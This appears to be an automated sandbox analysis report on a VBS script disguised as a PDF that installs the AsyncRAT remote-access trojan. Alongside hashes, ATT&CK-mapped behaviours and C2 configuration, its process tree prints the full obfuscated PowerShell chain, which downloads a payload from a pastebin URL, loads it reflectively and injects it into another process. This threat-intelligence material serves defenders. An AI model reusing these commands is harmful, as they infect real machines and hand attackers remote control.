Analysis
-
max time kernel
140s -
max time network
303s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-10-2024 15:26
Static task
static1
Behavioral task
behavioral1
Sample
Ad090512515541511555,PDF.vbs
Resource
win7-20241010-en
General
-
Target
Ad090512515541511555,PDF.vbs
-
Size
14.3MB
-
MD5
5565dd9e27b8d9d3f2c22656193a6a1c
-
SHA1
f41e89954e0dab2bd7139d5b89a2f80060487a17
-
SHA256
ec3753896e7a796986bdb9533cfb19481dd02e454fafad31c3c0f026da895afd
-
SHA512
966ad4fd2fcdcd1bd701a22a391db1ca8beb2af7309cbd49bdf0608b880bbfce3c03f83e9a9342af656d69fe1830526a4118491f83b927a6b34550a96e636f78
-
SSDEEP
1536:lyyyyyyyyyyyyyyyyyyyyyyyryyyyyyyyyyyyyyyyyyyyyyycyyyyyyyyyyyyyyD:2Z5b
Malware Config
Extracted
https://pastebin.com/raw/J6uRjZrv
Extracted
asyncrat
1.0.7
Octubre
dcrat2011.duckdns.org:2011
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exepowershell.exeflow pid process 9 468 powershell.exe 24 4472 powershell.exe 30 4472 powershell.exe 35 468 powershell.exe 37 468 powershell.exe -
Processes:
powershell.exepowershell.exepid process 3604 powershell.exe 468 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 468 set thread context of 3592 468 powershell.exe AddInProcess32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
AddInProcess32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3604 powershell.exe 3604 powershell.exe 468 powershell.exe 468 powershell.exe 4472 powershell.exe 4472 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exeAddInProcess32.exedescription pid process Token: SeDebugPrivilege 3604 powershell.exe Token: SeDebugPrivilege 468 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeDebugPrivilege 3592 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 3660 wrote to memory of 3604 3660 WScript.exe powershell.exe PID 3660 wrote to memory of 3604 3660 WScript.exe powershell.exe PID 3604 wrote to memory of 468 3604 powershell.exe powershell.exe PID 3604 wrote to memory of 468 3604 powershell.exe powershell.exe PID 468 wrote to memory of 3872 468 powershell.exe cmd.exe PID 468 wrote to memory of 3872 468 powershell.exe cmd.exe PID 468 wrote to memory of 1668 468 powershell.exe PING.EXE PID 468 wrote to memory of 1668 468 powershell.exe PING.EXE PID 468 wrote to memory of 4472 468 powershell.exe powershell.exe PID 468 wrote to memory of 4472 468 powershell.exe powershell.exe PID 468 wrote to memory of 3592 468 powershell.exe AddInProcess32.exe PID 468 wrote to memory of 3592 468 powershell.exe AddInProcess32.exe PID 468 wrote to memory of 3592 468 powershell.exe AddInProcess32.exe PID 468 wrote to memory of 3592 468 powershell.exe AddInProcess32.exe PID 468 wrote to memory of 3592 468 powershell.exe AddInProcess32.exe PID 468 wrote to memory of 3592 468 powershell.exe AddInProcess32.exe PID 468 wrote to memory of 3592 468 powershell.exe AddInProcess32.exe PID 468 wrote to memory of 3592 468 powershell.exe AddInProcess32.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ad090512515541511555,PDF.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹Sg☹2☹HU☹UgBq☹Fo☹cgB2☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bv☹HE☹dQB1☹HQ☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹cwB4☹Hg☹cQBk☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹HY☹cgBt☹GI☹cQ☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹dgBy☹G0☹YgBx☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹Jw☹w☹C8☹bg☹1☹Gg☹TQB6☹C8☹cg☹v☹GU☹ZQ☹u☹GU☹d☹Bz☹GE☹c☹☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹HM☹e☹B4☹HE☹Z☹☹g☹Cw☹I☹☹n☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹Gs☹ZwBs☹G0☹e☹Bf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹LQ☹t☹C0☹LQ☹t☹C0☹LQ☹n☹Cw☹I☹☹k☹G8☹cQB1☹HU☹d☹☹s☹C☹☹Jw☹x☹Cc☹L☹☹g☹Cc☹UgBv☹GQ☹YQ☹n☹C☹☹KQ☹p☹Ds☹';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\Ad090512515541511555,PDF.vbs');powershell $Yolopolhggobek;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$oquut = '0' ;$sxxqd = 'C:\Users\Admin\AppData\Local\Temp\Ad090512515541511555,PDF.vbs' ;[Byte[]] $vrmbq = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($vrmbq).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/n5hMz/r/ee.etsap//:sptth' , $sxxqd , '_________kglmx___________________________________-------', $oquut, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c4⤵PID:3872
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3592
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
1KB
MD5b8c4d5f49ff18903886471540bf61d6f
SHA1a00f8e2598da283a08f1cb0ec18887620688b9bb
SHA256264a4932161681f121c5ab94af79d7fa90a0ff889348faf38d60f1e7b981a9ff
SHA512efdfe1676873f6617fac0427cb1b7e9a504c2d2aa1be7cdf18141c633c4ddcc26d2dc9d8193a7010118315b9bb8fc539fef5456846a8d3a33f24b51a9f3c349b
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
69B
MD55c28f82f614a6673937d5c1da9d80a37
SHA1b447e5687c3d5d264f2192566a5d01babcc061a1
SHA256ede1395c29bcf17abaf921ab45f814ec21bb76285cc94836772c5474da24b861
SHA5129bd602b93f185a6d150f0976dd495798fd2e45af7c263a1d0a3181c96f5d851e391db363494703ad81c78eaaacb59f86832135c37c7c859e7e8b65f6e115d353
-
Filesize
103KB
MD5128e1fa5360ccb1bf503fb0afbe99d82
SHA108f1b78486201b40d2bb1d866389e097cfcfd785
SHA25602d0afdfe0f23ad2189bb057115b9265115739de6fd6429256875107931fa4e5
SHA5125dc44cb4bb58f468e13b8590df67a9ab1ce94e3a2003a18e3472be979ce752fd315cd43d44ac24e025ee3b72f469467f1128f60b041e5e7128d13b563bae3b2d